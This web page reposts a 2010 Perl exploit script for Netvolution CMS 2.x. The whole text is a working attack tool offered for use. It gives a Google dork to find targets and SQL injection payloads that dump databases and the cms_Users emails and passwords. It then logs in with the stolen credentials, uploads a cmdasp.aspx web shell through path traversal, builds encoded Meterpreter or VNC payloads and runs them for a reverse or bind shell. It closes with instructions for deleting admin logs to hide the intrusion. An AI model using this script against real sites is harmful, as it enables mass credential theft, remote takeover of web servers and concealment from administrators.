Home / os / win7

Netvolution CMS <= 2.x SQL Injection Exploit Script

Posted on 10 June 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Netvolution CMS &lt;= 2.x SQL Injection Exploit Script</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=================================================== Netvolution CMS &lt;= 2.x SQL Injection Exploit Script =================================================== #!/usr/bin/perl ######################################################################################### # # # Exploit Title: Netvolution exploit script for CMS Version &gt;= 2.xx.xx.xx # # Date: 10/6/2010 # # Sotware Link: www.netvolution.net # # Exploited by: krumel # # Exploit Coded: mr.pr0n # # # # Many thanks to icesurfer (author of SQLNINJA) and all p0wnbox members. # # I have contact www.atcom.gr no response yet, although it seems that they have patch # # partially the software. # ######################################################################################### # # # This program is free software; you can redistribute it and/or # # modify it under the terms of the GNU General Public License # # as published by the Free Software Foundation; either version 2 # # of the License, or (at your option) any later version. # # # # This program is distributed in the hope that it will be useful, # # but WITHOUT ANY WARRANTY; without even the implied warranty of # # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # # GNU General Public License for more details. # # # # You should have received a copy of the GNU General Public License # # along with this program; if not, write to the Free Software # # Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. # # # ######################################################################################### #Using some modules! use LWP::UserAgent; use IO::Socket; use IO::Handle; print &quot;e[1;31m _ _ _ _ _ _ _ _ _ e[0m &quot;; print &quot;e[1;31m | \ | | | | | | | | (_) | | (_) | e[0m &quot;; print &quot;e[1;31m | \| | ___| |___ _____ | |_ _| |_ _ ___ _ __ _____ ___ __ | | ___ _| |_ e[0m &quot;; print &quot;e[1;31m | . ` |/ _ \ __\ \ / / _ \| | | | | __| |/ _ \| '_ \ / _ \ \/ / '_ \| |/ _ \| | __| e[0m &quot;; print &quot;e[1;31m | |\ | __/ |_ \ V / (_) | | |_| | |_| | (_) | | | | | __/&gt; &lt;| |_) | | (_) | | |_ e[0m &quot;; print &quot;e[1;31m |_| \_|\___|\__| \_/ \___/|_|\__,_|\__|_|\___/|_| |_| \___/_/\_\ .__/|_|\___/|_|\__| e[0m &quot;; print &quot;e[1;31m | | e[0m &quot;; print &quot;e[1;31m |_| ...for CMS Version &gt;= 2.xx.xx.xx e[0m &quot;; # ************* # # Target dork. # ************* # print &quot; Google Dork:&quot;; print &quot; e[1;45mallinurl: 'default.asp?pid'e[0m &quot;; # ************ # # Main Menu. # ************ # menu:; print &quot; [*] Main Menu: &quot;; print &quot; 1. Automated list site scan for injection. &quot;; print &quot; 2. Export all Infomation_Schema Tables and Columns. &quot;; print &quot; 3. Find all Databases. &quot;; print &quot; 4. Export all usernames and passwords of the 'cms_Users' table. &quot;; print &quot; 5. Manuall exploitation. &quot;; print &quot; 6. Compatibility with the Metasploit Framework. &quot;; print &quot; 7. Exit. &quot;; print &quot;&gt; &quot;; $option=&lt;STDIN&gt;; print &quot; &quot;; if ($option!=1 &amp;&amp; $option!=2 &amp;&amp; $option!=3 &amp;&amp; $option!=4 &amp;&amp; $option!=5 &amp;&amp; $option!=6 &amp;&amp; $option!=7) { print &quot;e[1;31mWrong Option!!e[0m &quot;; goto menu; } # Select Option. if ($option==1) {&amp;site_scan} # Automated list site scan for injection. if ($option==2) {&amp;info_schema_tables_and_columns}# Export all Infomation_Schema Tables and Columns. if ($option==3) {&amp;extract_db}# Find all Databases. if ($option==4) {&amp;automated_exploitation}# Export all usernames and passwords of the 'cms_Users'table. if ($option==5) {&amp;manually}# Manuall exploitation. if ($option==6) {&amp;metasploit}# Compatibility with Metasploit Project (Under construction). if ($option==7) {&amp;quit}# Quit it! # ******************************************* # # Automated list site scan for injection. # ******************************************* # sub site_scan { $sites= &quot;/Users/pentest/Desktop/sites.txt&quot;; ######## ***[E_D_I_T H_E_R_E]*** ############## $scan = &quot;10+and+1=convert(int,db_name(1))&quot;; # Counter $i = 1; print &quot; [*]Opening site list... &quot;; open (SITELIST, $sites); print &quot; [*]Sitelist opened successfully! &quot;; print &quot; [*]Scanning... &quot;; @sitelist = &lt;SITELIST&gt;; print &quot; [*]Results: &quot;; for ($i; $i &lt;= @sitelist; $i++) { $host = $sitelist[$i]; chop ($host); $int = LWP::UserAgent-&gt;new() or die; $check=$int-&gt;get($host.$scan); if ($check-&gt;content =~ m/value '(.*)' to/g) { print &quot;e[1;36m$hoste[0m &quot;; } } goto menu; } # ********************************************************** # # Exploiting *all* the Infomation_Schema Tables and Columns. # ********************************************************** # sub info_schema_tables_and_columns { # ***************# # Table Counter # ***************# print &quot;Enter your Target (e.g.: http://www.target.gr/default.asp?pid=73&amp;artID=) &quot;; print &quot;&gt; &quot;; $atcom=&lt;STDIN&gt;; print &quot;Enter the range scanning of Tables (e.g.: 15): &quot;; print &quot;&gt; &quot;; $endt =&lt;STDIN&gt;; # Counter $countt = 1; print &quot; [*] Exloiting Information_Schema Tables... &quot;; $infoschema_t = &quot;10+and+1=convert(int,(se%l%e%c%t%20top%20%201%20table_name%20from%20Information_Schema.tables))&quot;; $int = LWP::UserAgent-&gt;new() or die; $check=$int-&gt;get($atcom.$infoschema_t); if ($check-&gt;content =~ m/value '(.*)' to/g) { ($first_t) = $1; print &quot;e[1;33m$first_te[0m &quot;; @chars_t = split(//, &quot;$first_t&quot;); $got_t = join(&quot;%&quot;, @chars_t); $first_t = &quot;%27$got_t%27&quot;; for ($countt; $countt &lt;= $endt; $countt++) { $fullsqli_t = &quot;10+and+1=convert(int,(se%l%e%c%t%20top%20%201%20table_name%20from%20Information_Schema.tables%20where%20table_name%20not%20in($first_t)))&quot;; $int = LWP::UserAgent-&gt;new() or die; $check=$int-&gt;get($atcom.$fullsqli_t); if ($check-&gt;content =~ m/value '(.*)' to/g) { ($next_t) = $1; print &quot;e[1;33m$next_te[0m &quot;; @chars_t = split(//, &quot;$next_t&quot;); $got_t = join(&quot;%&quot;, @chars_t); $next_t = $got_t ; $first_t = $first_t.&quot;,%27&quot;.$next_t.&quot;%27&quot;; } } } else { print &quot;e[1;31mFAILED!e[0m &quot;; } # ***************# # Column Counter # ***************# print &quot;Enter the range of scanning Columns (e.g.: 20) &quot;; print &quot;&gt; &quot;; $endc =&lt;STDIN&gt;; # Counter $countc = 1; print &quot;[*] Exloiting Information_Schema Column... &quot;; $infoschema_c = &quot;10+and+1=convert(int,(se%l%e%c%t%20top%20%201%20column_name%20from%20Information_Schema.columns))&quot;; $int = LWP::UserAgent-&gt;new() or die; $check=$int-&gt;get($atcom.$infoschema_c); if ($check-&gt;content =~ m/value '(.*)' to/g) { ($first_c) = $1; print &quot;e[1;33m$first_ce[0m &quot;; @chars_c = split(//, &quot;$first_c&quot;); $got_c = join(&quot;%&quot;, @chars_c); $first_c = &quot;%27$got_c%27&quot;; for ($countc; $countc &lt;= $endc; $countc++) { $fullsqli_c = &quot;10+and+1=convert(int,(se%l%e%c%t%20top%20%201%20column_name%20from%20Information_Schema.columns%20where%20column_name%20not%20in($first_c)))&quot;; $int = LWP::UserAgent-&gt;new() or die; $check=$int-&gt;get($atcom.$fullsqli_c); if ($check-&gt;content =~ m/value '(.*)' to/g) { ($next_c) = $1; print &quot;e[1;33m$next_ce[0m &quot;; @chars_c = split(//, &quot;$next_c&quot;); $got_c = join(&quot;%&quot;, @chars_c); $next_c = $got_c ; $first_c = $first_c.&quot;,%27&quot;.$next_c.&quot;%27&quot;; } } } else { print &quot;e[1;31mFAILED!e[0m&quot;; } goto menu; } # *************************************** # # Exploiting *all* the inside Databases. # *************************************** # sub extract_db { print &quot;Enter your Target (e.g.: http://www.target.gr/default.asp?pid=73&amp;artID=) &quot;; print &quot;&gt; &quot;; $atcom=&lt;STDIN&gt;; print &quot;Enter the range of scanning Databases (e.g.: 30) &quot;; print &quot;&gt; &quot;; $enddb =&lt;STDIN&gt;; # Counter $countdb = 1; print &quot;[*] Exloiting the inside Databases.... &quot;; for ($countdb; $countdb &lt;= $enddb; $countdb++) { $db = &quot;10+and+1=convert(int,db_name($countdb))&quot;; $int = LWP::UserAgent-&gt;new() or die; $check=$int-&gt;get($atcom.$db); if ($check-&gt;content =~ m/value '(.*)' to/g) { ($database) = $1; print &quot;[ID:$countdb]&quot;,&quot;e[1;35m$databasee[0m &quot;; } else { print &quot;e[1;31mFAILED!e[0m &quot;; } } goto menu; } # ***************************************************************** # # Exploiting *all* usernames and passwords of the table &quot;cms_Users&quot; # ***************************************************************** # sub automated_exploitation { print &quot;Enter your Target (e.g.: http://www.target.gr/default.asp?pid=73&amp;artID=) &quot;; print &quot;&gt; &quot;; $atcom=&lt;STDIN&gt;; print &quot;Enter the range of scanning userID (e.g.: 20) &quot;; print &quot;&gt; &quot;; $end =&lt;STDIN&gt;; # Counter $count = 1; print &quot;[*] Exloiting Usernames and Passwords... &quot;; for ($count; $count &lt;= $end; $count++) { $useremail = &quot;10+and+1=convert(int,(se%l%e%c%t(substring(useremail,1,1000))%20from%20cms_Users%20where%20userID=$count%29%29&quot;; $userpassword = &quot;10+and+1=convert(int,(se%l%e%c%t%20(substring(userpassword,1,10000))%20from%20cms_Users%20where%20userID=$count%29%29&quot;; $int = LWP::UserAgent-&gt;new() or die; $check=$int-&gt;get($atcom.$useremail); if ($check-&gt;content =~ m/value '(.*)' to/g) { ($email) = $1; print &quot;[ID:$count]&quot;,&quot; e[1;32m$emaile[0m&quot;; $gotmail = $email; # Usage for the section of Metasploit Framework. $int = LWP::UserAgent-&gt;new() or die; $check=$int-&gt;get($atcom.$userpassword); if ($check-&gt;content =~ m/value '(.*)' to/g){ ($pass) = $1; print &quot; : e[1;32m$passe[0m &quot;; $gotpass = $pass; # Usage for the section of Metasploit Framework. } else { print &quot; : e[1;31m-e[0m &quot;; }} else { print &quot;[ID:$count&quot;,&quot;] e[1;31m-e[0m : e[1;31m-e[0m &quot;; } } goto menu; } # **************************************** # # Exploiting Columns and Tables manually. # **************************************** # sub manually { print &quot;Enter your Target (e.g.: http://www.target.gr/default.asp?pid=73&amp;artID=) &quot;; print &quot;&gt; &quot;; $atcom=&lt;STDIN&gt;; print &quot;Enter the name of your target's Table (e.g.: cms_Users) &quot;; print &quot;&gt; &quot;; $table =&lt;STDIN&gt;; print &quot;Enter your the name of your target's Column (e.g.: userpassword) &quot;; print &quot;&gt; &quot;; $column =&lt;STDIN&gt;; print &quot;Enter the range of scanning (e.g.: 10) &quot;; print &quot;&gt; &quot;; $endm =&lt;STDIN&gt;; $countm = 1; print &quot;[*] Manuall Exploitation... &quot;; for ($countm; $countm &lt;= $endm; $countm++) { $manually = &quot;10+and+1=convert(int,(se%l%e%c%t(substring($column,1,1000))%20from%20$table%20where%20userID=$countm%29%29&quot;; $int = LWP::UserAgent-&gt;new() or die; $check=$int-&gt;get($atcom.$manually); if ($check-&gt;content =~ m/value '(.*)' to/g){ ($got) = $1; print &quot;[ID:$countm]&quot;,&quot; e[1;32m$gote[0m &quot;; } else { print &quot;[ID:$countm&quot;,&quot;] e[1;31m-e[0m : e[1;31m-e[0m &quot;; } } goto menu; } # ***************************************************************** # # Compatibility with the Metasploit Framework. # ***************************************************************** # sub metasploit { if (($gotmail eq &quot;&quot;) or ($gotpass eq &quot;&quot;)) { print &quot;Enter your Target (e.g.: http://www.target.gr/default.asp?pid=73&amp;artID=) &quot;; print &quot;&gt; &quot;; $atcom=&lt;STDIN&gt;; $end = 10; $count = 1; for ($count; $count &lt; $end; $count++) { $useremail = &quot;10+and+1=convert(int,(se%l%e%c%t(substring(useremail,1,1000))%20from%20cms_Users%20where%20userID=$count%29%29&quot;; $userpassword = &quot;10+and+1=convert(int,(se%l%e%c%t%20(substring(userpassword,1,10000))%20from%20cms_Users%20where%20userID=$count%29%29&quot;; $int = LWP::UserAgent-&gt;new() or die; $check=$int-&gt;get($atcom.$useremail); if ($check-&gt;content =~ m/value '(.*)' to/g) { ($email) = $1; $gotmail = $email; $int = LWP::UserAgent-&gt;new() or die; $check=$int-&gt;get($atcom.$userpassword); if ($check-&gt;content =~ m/value '(.*)' to/g){ ($pass) = $1; $gotpass = $pass; $end = $count; }} } } if ($atcom =~ m/www.(.*).gr/g){ ($site) = $1; } # Checking if the Metasploit Framework is already installed. print &quot;[*] Looking for the Metasploit Framework... &quot;; $msfcli = &quot;&quot;; $msfpayload = &quot;&quot;; if ($msfpath eq &quot;&quot;) { $path1 = $ENV{PATH}; @path = split(/:/,$path1); foreach (@path) { if (-e $_.&quot;/msfcli&quot;) { $msfcli = $_.&quot;/msfcli&quot;; } elsif (-e $_.&quot;/msfcli3&quot;) { $msfcli = $_.&quot;/msfcli3&quot;; } if (-e $_.&quot;/msfpayload&quot;) { $msfpayload = $_.&quot;/msfpayload&quot;; } elsif (-e $_.&quot;/msfpayload3&quot;) { $msfpayload = $_.&quot;/msfpayload3&quot;; } } } else { if (-e $msfpath.&quot;/msfcli&quot;) { $msfcli = $msfpath.&quot;msfcli&quot;; } elsif (-e $msfpath.&quot;/msfcli3&quot;) { $msfcli = $msfpath.&quot;msfcli3&quot;; } if (-e $msfpath.&quot;/msfpayload&quot;) { $msfpayload = $msfpath.&quot;msfpayload&quot;; } elsif (-e $msfpath.&quot;/msfpayload3&quot;) { $msfpayload = $msfpath.&quot;msfpayload3&quot;; } } if ($msfcli eq &quot;&quot;){ print &quot;[e[1;31m FAILED e[0m] &quot;; print &quot;[-] msfcli not found &quot;; exit(-1); } if ($msfpayload eq &quot;&quot;) { print &quot;[e[1;32m FAILED e[0m] &quot;; print &quot;[-] msfpayload not found &quot;; exit(-1); } print &quot;[e[1;32m DONE e[0m] &quot;; #Retrieve Cookie system('curl -k -L -b cookies.txt -c cookies.txt -o step-1.html http://www.'.$site.'.gr/'); system('curl -k -L -b cookies.txt -c cookies.txt -d email='.$gotmail.' -d password='.$gotpass.' -o step-2.html http://www.'.$site.'.gr/admin/default.asp?ac=2'); #Upload Web-Backdoor system('curl -k -L -b cookies.txt -c cookies.txt -F name=file1 -F filename=@cmdasp.aspx http://www.'.$site.'.gr/admin/tools/files/filesUpload.asp?folder=..%2F..%2F..%2Ffiles'); # Choose your payload. print &quot;Which payload you want to use? &quot;; print &quot; 1. Meterpreter 2. VNC &quot;; while (($payload ne 1) and ($payload ne 2)) { print &quot;msf &gt; &quot;; $payload = &lt;STDIN&gt;; chomp($payload); } if ($payload == 1) { $payload = &quot;meterpreter&quot;; } else { $payload = &quot;vncinject&quot;; } # Choose your connection. print &quot;Which type of connection you want to use? &quot;; print &quot; 1. bind_tcp 2. reverse_tcp &quot;; while (($conn ne &quot;1&quot;) and ($conn ne &quot;2&quot;)) { print &quot;msf &gt; &quot;; $conn = &lt;STDIN&gt;; chomp($conn); } if ($conn == 1) { $conn = &quot;bind_tcp&quot;; } else { $conn = &quot;reverse_tcp&quot;; } if ($conn eq &quot;bind_tcp&quot;){ print &quot;Enter your Remote host &quot;; print &quot;msf &gt; &quot;; $rhost = &lt;STDIN&gt;; chomp $rhost } else { print &quot;Enter your Public IP &quot;; print &quot;msf &gt; &quot;; $lhost = &lt;STDIN&gt;; chomp $lhost ; print &quot;Enter your Local Host &quot;; print &quot;msf &gt; &quot;; $lhost1 = &lt;STDIN&gt;; chomp $lhost1 ; } if ($conn eq &quot;bind_tcp&quot;){ print &quot;Enter Remote port number &quot;; } else { print &quot;Enter local port number &quot;; } $port = 0; while (($port &lt; 1) or ($port &gt; 65535)){ print &quot;msf &gt; &quot;; $port = &lt;STDIN&gt;; chomp($port); } # Choose your Encryption. $enc = -1; print &quot;[*] Choose a payload encoding method: &quot;. &quot; 0. None &quot;. &quot; 1. Alpha2 Alphanumeric Mixedcase &quot;. &quot; 2. Alpha2 Alphanumeric Uppercase &quot;. &quot; 3. Avoid UTF8/tolower &quot;. &quot; 4. Call+4 Dword XOR &quot;. &quot; 5. Single-byte XOR Countdown &quot;. &quot; 6. Variable-length Fnstenv/mov Dword XOR &quot;. &quot; 7. Polymorphic Jump/Call XOR Additive Feedback &quot;. &quot; 8. Non-Alpha &quot;. &quot; 9. Non-Upper &quot;. &quot; 10. Polymorphic XOR Additive Feedback &quot;. &quot; 11. Alpha2 Alphanumeric Unicode Mixedcase &quot;. &quot; 12. Alpha2 Alphanumeric Unicode Uppercase &quot;; while (($enc &lt; 0) or ($enc &gt; 12)) { print &quot;msf &gt; &quot;; $enc = &lt;STDIN&gt;; chomp($enc); } $encoder = &quot; encoder=&quot;; for ($enc) { /^0$/ &amp;&amp; do {$encoder = &quot;&quot;}; /^1$/ &amp;&amp; do {$encoder .= &quot;x86/alpha_mixed &quot;}; /^2$/ &amp;&amp; do {$encoder .= &quot;x86/alpha_upper &quot;}; /^3$/ &amp;&amp; do {$encoder .= &quot;x86/avoid_utf8_tolower &quot;}; /^4$/ &amp;&amp; do {$encoder .= &quot;x86/call4_dword_xor &quot;}; /^5$/ &amp;&amp; do {$encoder .= &quot;x86/countdown &quot;}; /^6$/ &amp;&amp; do {$encoder .= &quot;x86/fnstenv_mov &quot;}; /^7$/ &amp;&amp; do {$encoder .= &quot;x86/jmp_call_additive &quot;}; /^8$/ &amp;&amp; do {$encoder .= &quot;x86/nonalpha &quot;}; /^9$/ &amp;&amp; do {$encoder .= &quot;x86/nonupper &quot;}; /^10$/ &amp;&amp; do {$encoder .= &quot;x86/shikata_ga_nai &quot;}; /^11$/ &amp;&amp; do {$encoder .= &quot;x86/unicode_mixed &quot;}; /^12$/ &amp;&amp; do {$encoder .= &quot;x86/unicode_upper &quot;}; } # Creation of the executable payload. $exe = &quot;backup&quot;.int(rand()*010101); $command = $msfpayload.&quot; windows/&quot;.$payload.&quot;/&quot;.$conn.$encoder.&quot; exitfunc=process&quot;; if ($conn eq &quot;bind_tcp&quot;) { $command .= &quot; lport=&quot;.$port.&quot; X &gt; /tmp/&quot;.$exe.&quot;.exe&quot;; } else { $command .= &quot; lport=&quot;.$port.&quot; lhost=&quot;.$lhost.&quot; X &quot;.&quot;&gt; /tmp/&quot;.$exe.&quot;.exe&quot;; } if ($verbose == 1) { print &quot;[v] Command: &quot;.$command.&quot; &quot;; } system ($command); unless (-e &quot;/tmp/&quot;.$exe.&quot;.exe&quot;) { print &quot;[-] Payload creation... [e[1;31m FAILED e[0m] &quot;; exit(-1); } print &quot;[*] Payload creation... [e[1;32m DONE e[0m] &quot;; print &quot;[*] Payload (&quot;.$exe.&quot;.exe) created. &quot;; $xpl = '/tmp/'.$exe.'.exe'; #Upload the executable file to the remote Webserver. system('curl -k -L -b cookies.txt -c cookies.txt -F name=file1 -F filename=@'.$xpl.' http://www.'.$site.'.gr/admin/tools/files/filesUpload.asp?folder=..%2F..%2F..%2Ffiles'); $parameter = $exe.&quot;.exe&quot;; # The child handles the request to the target, the parent calls Metasploit Framework! $pid = fork(); if ($pid eq 0) { sleep(1); exit(0); } # This is the parent. $syscommand = $msfcli.&quot; exploit/multi/handler &quot;.&quot;PAYLOAD=windows/&quot;.$payload.&quot;/&quot;.$conn.&quot; &quot;; if ($conn eq &quot;bind_tcp&quot;) { $syscommand .= &quot;LPORT=&quot;.$port.&quot; RHOST=&quot;.$rhost.&quot; E&quot;; print &quot;e[1;34m$syscommande[0m &quot;; } else { $syscommand .= &quot;LPORT=&quot;.$port.&quot; LHOST=&quot;.$lhost1.&quot; E&quot;; print &quot;e[1;34m$syscommande[0m &quot;; } #Execute msfcli print &quot;Are you ready to execute msfcli? (Press Enter) &quot;; print &quot;msf &gt; &quot;; $enter = &lt;STDIN&gt;; chomp($enter); print &quot; Please Wait...&quot;; print &quot;[*] Executing the msfcli... [e[1;32m DONE e[0m] &quot;; system(&quot;xterm -bg black -fg white -bd black -e &quot;.$syscommand.&quot; &amp;&quot;); # If you don't have xterm, install IT! sleep(30); # Sleep 30 seconds to fire up Metasploit Framework! #Execute metasploit shell throught Web-Backdoor (cmdasp.aspx). system('curl -k -L -b /tmp/cookies.txt -c /tmp/cookies.txt -d __VIEWSTATE=%2FwEPDwULLTE2MjA0MDg4ODhkZKAYI%2BuShUtjaEQHez7lnHYtwecj -d txtArg=&quot;C:InetpubEventSitesenterpriseitsecurity.grfiles\'.$parameter.'&quot; -d testing=excute -d __EVENTVALIDATION=%2FwEWAwLw6bCOCgKa%2B%2BKPCgKBwth5tWrCE%2BPx6jReXWdJAVRgAZWRoxo%3D http://www.'.$site.'.gr/files/cmdasp.aspx'); } print &quot;# ******************************************************************************# &quot;; print &quot;# CAUTION CAUTION CAUTION CAUTION CAUTION *# &quot;; print &quot;# ******************************************************************************# &quot;; print &quot;# In Order to delete the logs go to http://www.target.gr/files/cmdasp.aspx *# &quot;; print &quot;# and execute the following command : *# &quot;; print &quot;# *# &quot;; print &quot;# sqlcmd -S target_IP -U Database_User -P Database_Password -d Target_Database *# &quot;; print &quot;# -Q ''delete from cms_AdminLog where logRecDbTable='Your_Public_IP' '' -u *# &quot;; print &quot;# *# &quot;; print &quot;# The Username and password for the Database can be found inside global.asa *# &quot;; print &quot;# ******************************************************************************# &quot;; # ***********# # Quitting :D # ***********# sub quit { print &quot;e[1;31mExiting...Bye-Bye!e[0m &quot;; exit(1); } # ***************************************************************** # # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-10]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP